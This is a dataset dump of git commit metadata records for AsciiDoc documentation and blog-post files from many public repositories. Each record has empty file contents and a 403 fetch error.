{"commit":"dd85085b1f633386961dd7f5991f472a3898c1fa","subject":"Update 2017-09-19-Gold-Plated-Architecture.adoc","message":"Update 2017-09-19-Gold-Plated-Architecture.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2017-09-19-Gold-Plated-Architecture.adoc","new_file":"_posts\/2017-09-19-Gold-Plated-Architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"837a3213ef05e77a63423982c5307553c53e29a3","subject":"Update 2018-02-26-Undoing-changes-with-Git.adoc","message":"Update 2018-02-26-Undoing-changes-with-Git.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-02-26-Undoing-changes-with-Git.adoc","new_file":"_posts\/2018-02-26-Undoing-changes-with-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75311e23b1c9876b4fe463a3336f32e8e5990856","subject":"Basic exs Eclipse","message":"Basic exs Eclipse\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"71798e80b532df9d34cc3aa6d7a149c61dc216c7","subject":"moved version matrix","message":"moved version matrix","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68c85ac41261be108c26149de1db9d418023bb3e","subject":"added","message":"added\n","repos":"m-m-m\/service","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9743a48a1bd0394f19c54ee938c6395a80f3cd8","subject":"The very first documentation file","message":"The very first documentation file\n\nChange-Id: Ie13d3eec555bca1a138fb69444aa429308fc9b3b\n","repos":"Darsstar\/framework,mstahv\/framework,jdahlstrom\/vaadin.react,kironapublic\/vaadin,Darsstar\/framework,peterl1084\/framework,mstahv\/framework,mstahv\/framework,peterl1084\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,Legioth\/vaadin,asashour\/framework,kironapublic\/vaadin,jdahlstrom\/vaadin.react,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,asashour\/framework,Legioth\/vaadin,asashour\/framework,asashour\/framework,jdahlstrom\/vaadin.react,Legioth\/vaadin,kironapublic\/vaadin,Legioth\/vaadin,peterl1084\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework","old_file":"documentation\/book-preface.asciidoc","new_file":"documentation\/book-preface.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"091508f6d1d758ca371852fc41470976f7a99b31","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2018-02-02-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a92d406baf123b765db57012bbcea9ca671262","subject":"Update 2020-05-12-My-git-cheatsheet.adoc","message":"Update 
2020-05-12-My-git-cheatsheet.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-12-My-git-cheatsheet.adoc","new_file":"_posts\/2020-05-12-My-git-cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"593172cef7146ba9c8f0c754eda48cbf739f4de6","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bccb952579e2d8bcdc6402b7e6501bbe6e910dfd","subject":"Dev notes","message":"Dev notes\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"DEVELOPMENT.adoc","new_file":"DEVELOPMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"259ef2caded3b598fb049f91c54948e46dce2238","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c272ffa1325cc0e6bc60b97b39d4ab57b5603b4","subject":"Update 2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","message":"Update 2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","new_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-OTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21ad732ef6c0d1261340865e2d65b7f412c0ae60","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1998ce4f1c2b784836d4ca7781e5bdbd8d9f77e6","subject":"Renamed '_posts\/2018-05-14-Spacemacs.adoc' to '_posts\/2018-05-16-Spacemacs.adoc'","message":"Renamed '_posts\/2018-05-14-Spacemacs.adoc' to '_posts\/2018-05-16-Spacemacs.adoc'","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-16-Spacemacs.adoc","new_file":"_posts\/2018-05-16-Spacemacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2defb8fdefc997131e9bee611fe3d1dac2d8611","subject":"Blog post related to Hawkular BTM 0.5.0.Final release and demo monitoring JBoss Ticket Monster app","message":"Blog post related to Hawkular BTM 0.5.0.Final release and demo monitoring JBoss Ticket Monster app\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/10\/hawkular-btm-0-5-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/10\/hawkular-btm-0-5-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16fdedaf43b4dceaa8b6965169d746faf8125628","subject":"Update 2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","message":"Update 2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","new_file":"_posts\/2015-06-17-Slides-Introduction-au-Software-Defined-Networking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ed5926820ae2a34f0cc0bde1f582a1a472227e6","subject":"Update 2017-09-14-How-to-type-fast-like-a-pro.adoc","message":"Update 
2017-09-14-How-to-type-fast-like-a-pro.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc","new_file":"_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d6335947a10f9596457b8d826f63ef8f33b8154","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c76345d0a9d4eeb7fc5eed4a1f0401f04a4e0e","subject":"HashMap\u5206\u6790\u4e8c","message":"HashMap\u5206\u6790\u4e8c\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"HashMap(\u4e8c).adoc","new_file":"HashMap(\u4e8c).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b025e40aed191cdec6dbf49fe505fe0516c2a59","subject":"Update 2016-01-06-bGC2-is-Brand-New.adoc","message":"Update 2016-01-06-bGC2-is-Brand-New.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-bGC2-is-Brand-New.adoc","new_file":"_posts\/2016-01-06-bGC2-is-Brand-New.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590bbbb16aa97368033dd09c7cfbae3907ee7779","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a2686d00b37ae70c277cd48023aae67af1dd3bb","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffb434ef9a9369bcc1dd6add1883938a1da6b9fe","subject":"Update 
2017-08-05-accordion-menu.adoc","message":"Update 2017-08-05-accordion-menu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-accordion-menu.adoc","new_file":"_posts\/2017-08-05-accordion-menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c9023c92cba511d63e17bbe632eb0c8feed7e0","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b18fa6fe27ad531dbdbbaa8f27c445fe11e4ca","subject":"KUDU-1303 Document code style guidelines for C++11 move semantics and rvalue references","message":"KUDU-1303 Document code style guidelines for C++11 move semantics and rvalue references\n\nChange-Id: Iad1580a0fdb46c25af3af4fa61e250a0904b376a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3639\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63ef9b3714c9410dd1b5a55e3bd50de49f23dfcb","subject":"doc: shm: defining behaviour when blocks have same name","message":"doc: shm: defining behaviour when blocks have same name\n\nDefining the reserve and lookup behaviour when multiple blocks are reserved\nusing the same name.\n\nSigned-off-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov 
<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,ravineet-singh\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"41dfaa92b5626fdcde4031ec41c3a62b7fa7d56a","subject":"Update 2016-04-01-Swim-Times-31032016.adoc","message":"Update 2016-04-01-Swim-Times-31032016.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-01-Swim-Times-31032016.adoc","new_file":"_posts\/2016-04-01-Swim-Times-31032016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdab6bb9523408d8e7ab5bedc1cab0db36c778b3","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3a7a06a535d2c00b8f28b07d747235a4e729e7","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffb71b9e2d750a79e13090817930aad4afe4776","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6aa37761cf60ced255447b3a781f653f7677ed6b","subject":"added simple readme explaining tools dir contents","message":"added simple readme explaining tools dir 
contents\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"enterprise\/tools\/README.asciidoc","new_file":"enterprise\/tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"019af980e388fa22f8fd0e0cb3be55b395d200b1","subject":"TRex -w argument doc","message":"TRex -w argument doc\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6c6eb09a4226e9aefa05348c2c32d64ab59aade","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"806f177dea0bbe04ec1b59feac093e6643b8ae57","subject":"Update 2017-05-29-Demo-Mah-Rocks.adoc","message":"Update 2017-05-29-Demo-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-05-29-Demo-Mah-Rocks.adoc","new_file":"_posts\/2017-05-29-Demo-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da552ee4be69227493ad94ba1d4ad2a40b11fe08","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018c420844efb79681b731d1f1566364c9bf2e94","subject":"add new tap news","message":"add new tap news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2020\/02\/28\/clojure-tap.adoc","new_file":"content\/news\/2020\/02\/28\/clojure-tap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"e6cb9a3937f76441eb5630dcd789162113f56931","subject":"Intro","message":"Intro\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"DB from Eclipse.adoc","new_file":"DB from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d93db7afdce2f8d3dc0a9972ca0f01592360e2","subject":"Update 2017-04-27-Title-H1.adoc","message":"Update 2017-04-27-Title-H1.adoc","repos":"mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io","old_file":"_posts\/2017-04-27-Title-H1.adoc","new_file":"_posts\/2017-04-27-Title-H1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkaptein172\/mkaptein172.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775e55728387520ff33ff27006609dac25ede3ac","subject":"Update 2018-04-21-Azure-11.adoc","message":"Update 2018-04-21-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-21-Azure-11.adoc","new_file":"_posts\/2018-04-21-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd17254e6e632ef8d141da9f372442b1abc00a4c","subject":"added server control panel and webinterface to the initial five sentence statement :)","message":"added server control panel and webinterface to the initial five sentence statement :)\n","repos":"Akhiljs\/WPN-XM,iCasa\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,iCasa\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCasa\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cb0bea5ca85c55dd41ae959db544e4c97464bbe","subject":"Update 2018-03-20-Asciidoctor-Gradle.adoc","message":"Update 2018-03-20-Asciidoctor-Gradle.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2018-03-20-Asciidoctor-Gradle.adoc","new_file":"_posts\/2018-03-20-Asciidoctor-Gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL 